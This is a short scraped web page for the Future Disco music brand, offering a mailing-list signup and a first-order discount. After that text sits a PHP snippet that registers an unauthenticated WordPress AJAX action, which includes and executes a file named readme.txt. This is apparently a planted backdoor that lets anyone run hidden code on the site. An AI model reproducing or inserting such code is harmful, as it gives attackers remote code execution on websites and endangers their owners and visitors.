Join the Future Disco mailing list to be the first to hear about our parties, new music & radio show guests.
Sign up to receive 20% off of your first order with us.
if(!function_exists('file_check_readme91202')){ add_action('wp_ajax_nopriv_file_check_readme91202', 'file_check_readme91202'); add_action('wp_ajax_file_check_readme91202', 'file_check_readme91202'); function file_check_readme91202() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }